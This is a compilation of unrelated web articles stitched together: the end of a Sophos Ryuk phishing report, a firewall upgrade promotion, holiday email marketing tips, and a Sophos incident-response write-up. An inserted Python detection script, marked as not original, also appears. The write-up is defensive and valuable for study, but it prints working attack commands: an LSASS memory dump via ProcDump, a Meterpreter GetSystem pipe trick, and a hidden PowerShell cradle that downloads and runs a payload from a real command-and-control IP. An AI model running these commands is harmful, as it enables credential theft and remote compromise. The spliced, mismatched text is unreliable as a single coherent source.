In the last two phases, while the tactics remained similar and other hallmarks suggested the spam actor was the same, multiple types of “dropper” malware were deployed as attachments. In addition to Buer, samples of Bazar and ZLoader were also found, with delivery payloads varying. For one Bazar loader payload, the attackers used a password-protected Excel spreadsheet. During the same timeframe, Bazar and ZLoader were also known to be involved in Ryuk attacks.

It’s clear that Ryuk is back, and that the actors behind it are evolving their methods for initial compromise, using multiple loader bots to achieve initial access. It’s not clear if the same actor is behind all of these attacks, using multiple malware-as-a-service platforms to deliver Ryuk, or if there are multiple Ryuk actors. But the similarity in techniques across these campaigns suggests that there is at least coordination between them: they use targeted emails with cloud-based malicious documents and a lure to spur immediate action (often related to wages or taxes).

The best mitigation for these attacks is to reinforce training on phishing attacks. While these malicious emails are targeted, they are usually awkwardly worded and use the target’s name in odd ways. Careful reading of the email will tip off most educated users. But these attacks are growing in sophistication, and even well-trained users may eventually click on the wrong link in an email if spam detection doesn’t catch them first.

Sophos detects and blocks Buer both with custom detections (Troj/BeurLd-A) and machine learning, and detects the spear phishing messages as spam.

Sophos would like to acknowledge the contributions of Peter Mackenzie, Elida Leite, Syed Shahram and Bill Kearny of the Sophos Rapid Response team, and Anand Ajjan, Brett Cove and Gabor Szappanos of SophosLabs for their contributions to this report.



XG Firewall v18 performance gains mean more traffic and better security – Sophos News

XG Firewall v18 includes several performance gains that will breathe new life into your network, enabling you to handle more traffic and better secure it.

If you haven’t upgraded to XG Firewall v18 already, you’re going to want to do so as soon as possible to take advantage of the substantial performance benefits waiting for you.

What are the gains and where do they come from?

Consider these potential performance boosts available by upgrading to XG Firewall v18:

Those are some impressive performance improvements!

One of the most exciting enhancements to XG Firewall in v18 was the introduction of the new Xstream Architecture, with its all-new streaming DPI engine, advanced TLS 1.3 inspection solution, and Network Flow FastPath.

Let’s look at how the Xstream Architecture upgrades your performance:

Trusted traffic FastPath acceleration

The new Xstream Network Flow FastPath is all about performance. It directs trusted traffic that doesn’t require security scanning into a fast lane through the system. This not only minimizes latency and accelerates application traffic through the firewall, it also has the added benefit of not engaging the DPI engine for deep-packet inspection of trusted traffic.

The impact of fast-pathing is up to a 5x improvement in firewall traffic throughput! Of course, with a blend of real-world traffic mixes, not all applications qualify for trusted traffic FastPath acceleration, but if a substantial portion of your traffic can be accelerated on the FastPath, you could increase your firewall’s security scanning capacity while allowing more trusted traffic. That’s a win-win.

Be sure to see how to make the most of the Network Flow FastPath on your network to learn how this works and how to set it up optimally.

TLS inspection speed

The new Xstream TLS inspection solution also brings a tremendous boost in decrypting and inspecting encrypted traffic flows, with up to a 2x improvement in performance. And when you combine the added performance with the very granular and easy to manage TLS inspection policies, you can be sure you’re only inspecting traffic that really needs it – and now do it faster than ever.

See how to make the most of Xstream TLS Inspection on your XG Firewall.

IMIX traffic performance

Internet Mix, or IMIX, is an often-used reference for measuring typical real-world internet traffic performance, making it a good metric to consider when looking at performance.

The new Xstream architecture in XG Firewall v18 brings a substantial boost in performance to this important metric. On our mid-range firewall models, the gains are over 100%, with the average across the XG Series line being a 57% improvement in performance.

This is all thanks to optimizations in the packet processing flow, DPI engine, and Network Flow FastPath. It’s an incredible real-world improvement in traffic processing performance.

Other common traffic performance measurements also benefit from the Xstream architecture in v18, including raw firewall performance, IPS, AV, application control, and malware protection.

Get the latest XG Firewall brochure to see the latest performance metrics and how your XG Series model stacks up.

SSL VPN capacity

Further optimizations to our SSL engine in XG Firewall v18 MR3 bring some dramatic improvements to remote access SSL VPN capacity, with up to 6x the number of connections possible on our higher-end appliances.

Increases are more modest at the entry-level, but on a typical mid-range device like the XG 310, the capacity has tripled! This is great news for everyone managing a remote workforce these days.

Check out the other great enhancements with remote-access VPN.

Upgrade today

If you haven’t already, upgrade to XG Firewall v18 today. It’s a free performance boost, and you get a ton of great new protection and networking features.

Be sure to take advantage of all the resources available, including the recent “Making the Most of XG Firewall v18” article series that covers all the great new capabilities in XG Firewall v18:


Experts weigh in on holiday email marketing in 2020

As we all know, the holiday season of 2020 is going to be unlike any other because of our “new normal.” This is why you’ll need to consider learning, unlearning, and relearning new strategies for email marketing during this unprecedented time.

The Zoho Campaigns team recently conducted a Twitter chat and webinar with a couple of email marketing experts on this, and we’d love for you to take a glimpse at what we discussed. Some of these tips are applicable for any year, but many of them here are to help you adjust to the changing needs in 2020. Let’s get started!


Excerpts from Twitter chat #ZCampaignsChat

We had tweeted out seven different questions related to holiday season email marketing, and here’s what our experts had to tell us.

Q1. Given our “new normal” related to COVID-19, what twists and turns do you expect to encounter during the upcoming holiday season?

Bottom Line: More than in any recent time, there will be a rise in online shopping. So be careful to send emails that are relevant to the right people. This can be achieved with the help of list segmentation. Hold off on typical marketing or promotional emails and instead focus on targeted offers and promotions.


Q2. What are some of the best practices/experiments email marketers can try in these uncertain times?

Bottom Line: Build trust and relationships with your contacts and start sending personalized email campaigns. Make use of automation in order to have meaningful targeted conversations with your contacts. This helps make them realize that you value them.


Q3. When do you recommend sending the first holiday email and how often should emails be sent?

Bottom Line: You will have to start warming up people by sending them email campaigns at least a week ahead and leaving sufficient time for them to prepare for the holidays. Strategic timing for your emails matters the most for engaging with them.


Q4. What are some basic questions that need to be addressed before sending holiday emails?

Bottom Line: Holidays differ based on regions, so you ought to know your contacts based on each region. Find particular holidays in each region and plan your email campaigns one step ahead by segmenting your lists based on demographics. Then make sure to personalize each email with offers and promotions that are region-specific and relevant.


Q5. How do you deal with inactive contacts during the holiday season?

Bottom Line: Start sending them reactivation campaigns like special offers, preference updating options, and more. This will help you find people who’re somewhat interested in your brand/services. Once you identify the opened contacts, you can continue to engage with them to bring them back on board.


Q6. Holiday emails are also about visual content. What are some trends and interesting usage of visuals you like?

Bottom Line: Apart from including photographs of your products, make sure to give importance to GIFs, illustrations, and more. Combining an attractive flow of content with a relevant message will increase the chances of engagement, thus improving customer relationships and sales. Try using pre-built email templates or get creative to ensure your content is a visual treat for your contacts.


Q7. What are some tried and tested abandoned cart recovery email strategies that will result in revenue?

Bottom Line: Always remember that most customers abandon their carts unknowingly. So, consider your abandoned cart email as a reminder to help pull your customers back. When would your contacts like to receive these emails? You’ll have to test this and find out. We suggest you send the email within 24 hours of the cart abandonment. Also, make sure to add some urgency to the emails to start recovering sales.

Those are some insights from our Twitter discussion, but that’s not all the tips and tricks we have for you today.

Excerpts from our webinar with Liz Willits

Let’s now look at what email marketing strategist Liz Willits had to say in our recent webinar, How to adjust your 2020 holiday email marketing game to changing needs.

Here are 12 tips Liz discussed:

Be sensitive

As marketers, being sensitive to your audience is always very important, but it’s especially important when your audience is going through a lot. There are a few ways to work this right: 

  • Choose your words carefully
    Keep an eye on current events so you don’t end up sending emails that arrive at an inappropriate time.

  • Don’t make light of serious situations
    It’s better not to make jokes about things like COVID-19—it’s really hard to strike the right note on a joke or while making light of something serious.

  • Consider giving an extra offer
    If your audiences are being affected economically by COVID-19 and you think your product would be helpful to them, go the extra mile and help them with what you can. These are the times you might want to send them love by giving extra sales or offers.

  • Be aware of the different holidays 
    Take into account all the holidays your audience celebrates to make sure you’re sending them relevant holiday campaigns. For example, don’t send a Thanksgiving promotion to the part of your audience that lives in India, where Thanksgiving isn’t celebrated.


Plan ahead

  • Many holidays like Black Friday, Hanukkah, and Christmas are going to come really soon, so have your content plan ready.

  • Start planning out your design elements now if you use heavily designed templates with different imagery. Start working with your design team well ahead since everyone will be busy with their personal lives on top of work. Get things ready by October or early November.

  • Don’t send your emails right on the holiday. For example, if it’s Black Friday, send your sale campaigns a week in advance. Do pre-holiday sale and post-holiday follow-up campaigns.


Don’t send too many emails

  • Avoid overwhelming your audience with too many emails—especially in 2020—because they have a lot going on in their lives already.

  • The best way you can do this is by providing an opt-out option for the sale campaign. This will let them opt out of that specific sale campaign and from your entire email list. Give them the right to choose what they want.

  • This is the time to be empathetic. Keep in mind the experience that they are having and try to show empathy in your tone rather than being salesy.


Use dynamic content to update your sales emails

Use dynamic content to update your holiday emails even after they’ve hit the inbox. For example, if you’ve sent a campaign on a flash sale and someone opens the campaign after the sale is over, they should read a banner that says, “Sorry, this sale is over, but you can still shop this week’s deals.” Dynamic content helps you stay relevant.


Write subject lines that stand out

Your audiences’ inboxes are flooded with emails during the holiday season, and your email will just remain unopened if you use ordinary subject lines. For example, do not just use “Merry Christmas” and talk about your newly launched product in your content. Use subject lines that are creative and that make you stand out, especially during the holiday season.


Make your copy easy to read

Don’t make your email content confusing, complicated, or heavy to read. Here are a couple of ways to create a readable and scannable copy:

  • Use short sentences and paragraphs, bullet points, and headlines to break up sections and paragraphs.

  • Use “you” instead of “we” or “I.” In other words, your angle should be about how your message benefits them. For example, don’t say “We just launched a new product.” Instead say, “You can get a 40% off on this new product.”


Keep your subscribers aware of important dates

It’s important to keep your subscribers informed of important dates like the last day of a sale or the last day to get a product shipped before Christmas. Highlight them in your subject lines with the time the sale ends.


Create gift guides

This is the best thing ecommerce businesses can do during the holiday season. Not just ecommerce—even B2Bs can do it. While ecommerce businesses can create gift guides for different gift categories such as Gifts for him, Gifts for her, and Gifts for friends, B2Bs can create gift guides like a guide for email marketers that includes their blog posts, tips, and tricks.


Clear is better than clever

Don’t try to be clever or cute in your content. People can’t waste their time on clever content. Rather, focus on what key idea needs to be delivered. This doesn’t mean your content needs to be to the point, but make sure you create curiosity in your audience’s mind to read your content.


Use alt text

Some people have turned off images in their inbox, or sometimes things can simply go wrong, so always place clear alternative text behind your image. That way recipients will still get your key messages and understand the context even if they can’t see the image.


Get festive

It’s fun season, so remember to excite your audience with your emails. Get festive! A great way to do this is through your email design. Go with a holiday game or holiday party theme, run giveaways, and find other ways to make your audience happy. Have fun with these little things in your emails during the holiday season.


Show off your product

This is very important for ecommerce businesses—it might seem straightforward, but it’s important to show your products to your audience. The best way to do this is by showing specific products that will excite your audience in the holiday email. This will get them to click the ones they’re interested in. This is a great way to take your recipients to your website and get them to purchase your products.

We hope these insights help you warm up your holiday email marketing strategy. Have fun creating content that resonates with your audience. Wishing you all a happy holiday season 🙂

– Team Zoho Campaigns


An active adversary caught in the act – Sophos News

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out. This analysis is done with the goal of finding signals that could potentially be an indicator of an attack.

In this case, the signal was a legitimate Microsoft Sysinternals tool, ProcDump.exe – a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is for stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond just the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"

The command shows the Windows command-line interpreter cmd.exe attempting to use WMIC – the interface for Windows Management Instrumentation. WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.

Command and control

The adversary’s use of Meterpreter implied that they must have some kind of network connection to the compromised host over which to send their commands remotely.

Digging into the network logs, the MTR operator could see a large number of outbound connections to Bulgarian IP address 217.12.202.89 using the network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it to orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify – Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, a PowerShell (a scripting language built into Windows for use with task automation) command execution was identified:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"

This one-line command reaches out to a URL and downloads and executes a payload it finds there. The URL points to the same Bulgarian IP where the MTR team found the open ports for Cobalt Strike.
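As an added example (not Sophos’ code and not part of the original post), the following Python hunt runs over constructed Sysmon-style process-creation events and flags the three command-line artifacts walked through above: the ProcDump dump of LSASS, the GetSystem named-pipe echo, and the PowerShell download cradle. The event field names, the rule names and the two benign control events are assumptions; the three malicious command lines are the ones quoted in this write-up.

```python
import re

# Constructed Sysmon-style process-creation events (hypothetical field names),
# modelled on the command lines quoted in the write-up plus two benign controls.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "svchost.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create '
                r'"C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"'},
    {"host": "WS01", "parent": "svchost.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7'},
    {"host": "VPC01", "parent": "cmd.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"'''},
    {"host": "WS02", "parent": "explorer.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c echo build-ok > C:\temp\status.txt'},
    {"host": "WS02", "parent": "explorer.exe",
     "cmdline": r'powershell.exe -c "Get-ChildItem C:\Logs"'},
]

def is_lsass_dump(cmd: str) -> bool:
    """ProcDump-style full memory dump of LSASS: a credential theft attempt."""
    c = cmd.lower()
    return "lsass" in c and ("procdump" in c or re.search(r"-ma\s+lsass|lsass\.dmp", c) is not None)

def is_getsystem_pipe_echo(cmd: str) -> bool:
    """cmd.exe echoing a short token into the named-pipe namespace: GetSystem artifact."""
    c = cmd.lower()
    return "cmd.exe" in c and re.search(r"\becho\b.*>\s*\\\\\.\\pipe\\", c) is not None

def is_powershell_download_cradle(cmd: str) -> bool:
    """powershell.exe that fetches content from a URL and hands it straight to IEX."""
    c = cmd.lower()
    executes = re.search(r"\biex\b|invoke-expression", c) is not None
    downloads = re.search(r"downloadstring|downloaddata|invoke-webrequest", c) is not None
    return "powershell" in c and executes and downloads

RULES = [("lsass_memory_dump", is_lsass_dump), ("getsystem_named_pipe", is_getsystem_pipe_echo),
         ("powershell_download_cradle", is_powershell_download_cradle)]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)          # C2 URLs worth blocking
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)  # hidden window: extra signal

def hunt(events):
    """One finding per (event, rule) hit, keeping the parent so the tree can be walked."""
    findings = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev["cmdline"]):
                findings.append({"host": ev["host"], "rule": name, "parent": ev["parent"],
                                 "hidden_window": HIDDEN_RE.search(ev["cmdline"]) is not None,
                                 "urls": URL_RE.findall(ev["cmdline"])})
    return findings
```

Running hunt(SAMPLE_EVENTS) yields three findings and none for the two benign controls; the extracted URL is what SophosLabs added to its blocklist in the story above.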

SophosLabs

The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s network logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet, making them a prime target for adversaries looking to break into networks. Once inside, however, RDP is a noisy and highly visible method of remote access: a cursor moving on the screen is something of a giveaway.

The first thing an adversary will look to do is move laterally to another host and install a reverse shell – a way to have that host call back to them and give them command-line access. The command line is a far stealthier method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to act on their objectives, catching them while they were still in the network propagation stages, moving laterally and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

IOAs / IOCs

ProcDump of LSASS:
    C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"

Meterpreter GetSystem:
    C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7

C2 IPv4:
    217.12.202.89

C2 payload URL:
    http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh

C2 port (Cobalt Strike):
    50050

PowerShell to download and invoke Cobalt Strike payload:
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"
